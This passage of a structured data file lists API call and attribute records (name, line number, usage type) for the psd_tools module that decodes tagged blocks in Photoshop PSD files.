"psd_tools.utils.read_fmt", "line_number": 429, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 430, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 431, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.GRADIENT_MAP_SETTING", "line_number": 403, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 403, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 442, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 443, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 445, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.UnknownOSType", "line_number": 447, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 448, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.EXPORT_DATA", "line_number": 440, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 440, "usage_type": "name"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 454, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 454, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.REFERENCE_POINT", "line_number": 452, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 452, "usage_type": "name"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 459, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 459, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.SHEET_COLOR_SETTING", "line_number": 457, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 457, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.SECTION_DIVIDER_SETTING", "line_number": 465, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 465, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.SECTION_DIVIDER_SETTING", "line_number": 462, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 462, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.NESTED_SECTION_DIVIDER_SETTING", "line_number": 471, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", 
"line_number": 471, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.NESTED_SECTION_DIVIDER_SETTING", "line_number": 468, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 468, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 475, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 477, "usage_type": "call"}, {"api_name": "psd_tools.constants.SectionDivider.is_known", "line_number": 478, "usage_type": "call"}, {"api_name": "psd_tools.constants.SectionDivider", "line_number": 478, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 479, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 484, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 493, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 494, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 495, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.PLACED_LAYER_DATA", "line_number": 490, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 490, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.SMART_OBJECT_PLACED_LAYER_DATA", "line_number": 491, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 491, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 501, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 502, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 505, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 509, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.UnknownOSType", "line_number": 511, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 512, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.VECTOR_STROKE_DATA", "line_number": 499, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 499, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 518, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 519, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 522, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 526, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.UnknownOSType", "line_number": 527, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 528, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.VECTOR_STROKE_CONTENT_DATA", "line_number": 516, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 516, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 536, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 537, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 543, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 545, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 554, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 555, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 557, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.UnknownOSType", "line_number": 558, "usage_type": "name"}, {"api_name": 
"warnings.warn", "line_number": 561, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.METADATA_SETTING", "line_number": 534, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 534, "usage_type": "name"}, {"api_name": "psd_tools.utils.unpack", "line_number": 570, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.PROTECTED_SETTING", "line_number": 568, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 568, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 582, "usage_type": "call"}, {"api_name": "psd_tools.reader.layers", "line_number": 583, "usage_type": "name"}, {"api_name": "psd_tools.reader.layers._read_layers", "line_number": 583, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoder.decode_layers", "line_number": 584, "usage_type": "call"}, {"api_name": "psd_tools.reader.layers", "line_number": 584, "usage_type": "argument"}, {"api_name": "psd_tools.constants.TaggedBlock.LAYER_32", "line_number": 578, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 578, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 591, "usage_type": "call"}, {"api_name": "psd_tools.reader.layers", "line_number": 592, "usage_type": "name"}, {"api_name": "psd_tools.reader.layers._read_layers", "line_number": 592, "usage_type": "call"}, {"api_name": "psd_tools.decoder.decoder.decode_layers", "line_number": 593, "usage_type": "call"}, {"api_name": "psd_tools.reader.layers", "line_number": 593, "usage_type": "argument"}, {"api_name": "psd_tools.constants.TaggedBlock.LAYER_16", "line_number": 587, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 587, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 598, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 599, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 603, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 607, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.UnknownOSType", "line_number": 608, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 609, "usage_type": "call"}, {"api_name": "psd_tools.decoder.engine_data.decode", "line_number": 616, "usage_type": "call"}, {"api_name": "psd_tools.decoder.engine_data", "line_number": 616, "usage_type": "name"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 618, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 620, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 624, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.UnknownOSType", "line_number": 625, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 626, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 629, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.TYPE_TOOL_OBJECT_SETTING", "line_number": 596, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 596, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.CONTENT_GENERATOR_EXTRA_DATA", "line_number": 636, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 636, "usage_type": "name"}, {"api_name": "psd_tools.decoder.engine_data.decode", "line_number": 643, "usage_type": "call"}, {"api_name": 
"psd_tools.decoder.engine_data", "line_number": 643, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.TEXT_ENGINE_DATA", "line_number": 641, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 641, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 651, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.UNICODE_PATH_NAME", "line_number": 646, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 646, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.ANIMATION_EFFECTS", "line_number": 655, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 655, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 662, "usage_type": "call"}, {"api_name": "psd_tools.decoder.color.decode_color", "line_number": 663, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 664, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.FILTER_MASK", "line_number": 660, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 660, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 670, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 671, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 674, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 678, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.UnknownOSType", "line_number": 679, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 680, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.VECTOR_ORIGINATION_DATA", "line_number": 668, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 668, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.PIXEL_SOURCE_DATA1", "line_number": 686, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 686, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 693, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 694, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.PIXEL_SOURCE_DATA2", "line_number": 691, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 691, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 701, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 702, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 706, "usage_type": "call"}, {"api_name": "psd_tools.decoder.path.decode_path_resource", "line_number": 710, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.VECTOR_MASK_SETTING1", "line_number": 698, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 698, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.VECTOR_MASK_SETTING2", "line_number": 699, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 699, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.ARTBOARD_DATA1", "line_number": 715, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 715, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.ARTBOARD_DATA2", "line_number": 716, "usage_type": "attribute"}, 
{"api_name": "psd_tools.constants.TaggedBlock", "line_number": 716, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.ARTBOARD_DATA3", "line_number": 717, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 717, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 725, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 726, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 728, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_pascal_string", "line_number": 730, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 731, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 732, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 733, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.decode_descriptor", "line_number": 734, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.PLACED_LAYER_OBSOLETE1", "line_number": 722, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 722, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.PLACED_LAYER_OBSOLETE2", "line_number": 723, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 723, "usage_type": "name"}, {"api_name": "psd_tools.decoder.linked_layer.decode", "line_number": 746, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.LINKED_LAYER1", "line_number": 740, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 740, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.LINKED_LAYER2", "line_number": 741, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 741, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.LINKED_LAYER3", "line_number": 742, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 742, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.LINKED_LAYER_EXTERNAL", "line_number": 743, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 743, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 753, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 755, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.CHANNEL_BLENDING_RESTRICTIONS_SETTING", "line_number": 749, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 749, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 762, "usage_type": "call"}, {"api_name": "psd_tools.decoder.color.decode_color", "line_number": 763, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 764, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.USER_MASK", "line_number": 760, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 760, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 772, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 773, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 775, "usage_type": "call"}, {"api_name": "psd_tools.constants.TaggedBlock.FILTER_EFFECTS1", "line_number": 768, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 768, "usage_type": "name"}, 
{"api_name": "psd_tools.constants.TaggedBlock.FILTER_EFFECTS2", "line_number": 769, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 769, "usage_type": "name"}, {"api_name": "psd_tools.constants.TaggedBlock.FILTER_EFFECTS3", "line_number": 770, "usage_type": "attribute"}, {"api_name": "psd_tools.constants.TaggedBlock", "line_number": 770, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 782, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_pascal_string", "line_number": 783, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 784, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 787, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 788, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 792, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 795, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.RawData", "line_number": 798, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 804, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 805, "usage_type": "call"}, {"api_name": "psd_tools.utils.read_fmt", "line_number": 806, "usage_type": "call"}, {"api_name": "psd_tools.decoder.actions.RawData", "line_number": 808, "usage_type": "call"}]}